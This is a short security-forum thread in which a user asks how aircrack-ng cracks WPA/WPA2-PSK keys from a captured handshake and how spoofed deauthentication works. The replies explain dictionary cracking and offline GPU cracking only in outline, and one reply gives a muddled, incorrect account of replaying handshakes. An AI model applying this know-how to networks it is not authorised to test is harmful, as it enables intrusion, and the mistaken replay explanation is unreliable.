Results 1 to 4 of 4

Thread: what is the real idea behind cracking WPA/WPA2-PSK with aircrack-ng?

  1. #1
    Just burned his ISO
    Join Date
    Jul 2011
    Posts
    2

    Default what is the real idea behind cracking WPA/WPA2-PSK with aircrack-ng?

    hi guys,
    just for educational purpose, i am wondering what is the actual idea behind cracking WPA/WPA2-PSK with aircrack-ng?
    ok, i know that we need to capture first the 4-way authentication handshake first in order to crack the PSK. and i also know the whole process how to successful done that to get the key cracked. but here my idea is the actual aircrack-ng technique regarding the key cracking process.
    in the tutorial: how to crack WPA/WPA2 on the aircrack-ng website, it is written that 4-way handshake packets is captured and used to break the pre-shared key PSK. but as far as i know, in the 4-way handshake process, the actual PSK key is not shared between the client and the access point AP. the only information shared between the client and the AP are ANonce, SNonce+MIC, Ack, etc... but not the PSK itself. PSK is shared between the client and the AP BEFORE the 4-way handshake.
    here is the source of my reference for more idea about 4-way handshake and PSK. http://www.airtightnetworks.com/home...er/80211i.html
    Thus my question is how does the aircrack-ng process the PSK through the 4-way handshake even though the PSK itself is not included inside the handshake? or may be i got the total wrong idea for all... And again this is only for educational purpose to know more about the WPA/WPA2 cracking process.
    And my second thought is, although i know how to deauthenticate the victim client to force the authentication process in BT5, how would my wireless station let the victim client knows that it is no longer associated with the AP? is that by injecting the spoofed deauthentication packet, as if the deauth packet is sent from the AP, meaning spoofing the sending address in the deauth packet as AP and the destination address be the victim client?
    thx alot ......
    cheers

  2. #2
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: what is the real idea behind cracking WPA/WPA2-PSK with aircrack-ng?

    the key is used for encrypting along with essid and.... the point is with the other variables known, the crack encrypts with them based off a dictionary looking for an ecrypted handshake match. if it finds one, it found your key.

  3. #3
    Junior Member
    Join Date
    Jan 2010
    Posts
    27

    Default Re: what is the real idea behind cracking WPA/WPA2-PSK with aircrack-ng?

    You capture original handshake, then you trying to imitate that handshake, once you done, you go to that AP again and give him that same handshake, AP thinks, -"Oh..it's you again". smth like tht lol.

    I think you don't have to capture it either, just brutforce it on place, but the problem is lack of resources (notebook) and tools. This is why you have to capture it, so you going home where pyrit holds terabytes of hashes and CUDA does it 10 times faster.

  4. #4
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: what is the real idea behind cracking WPA/WPA2-PSK with aircrack-ng?

    Reading the documentation on the aircrack-ng website will answer your questions. As this has been widely covered for years there is no more need to redo it here.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

Similar Threads

  1. [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)
    By g0tmi1k in forum BackTrack Videos
    Replies: 37
    Last Post: 04-22-2011, 02:14 PM
  2. Fake AP to get real password (WPA, WPA2, WEP)
    By illera88 in forum Beginners Forum
    Replies: 1
    Last Post: 01-01-2011, 07:50 AM
  3. WPA Cracking & Wordlist IDEA
    By modacompany in forum OLD BT4beta HowTo's
    Replies: 45
    Last Post: 06-03-2009, 12:15 AM
  4. WPA/WPA2 cracking
    By agniusm in forum OLD Newbie Area
    Replies: 4
    Last Post: 11-23-2008, 12:59 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •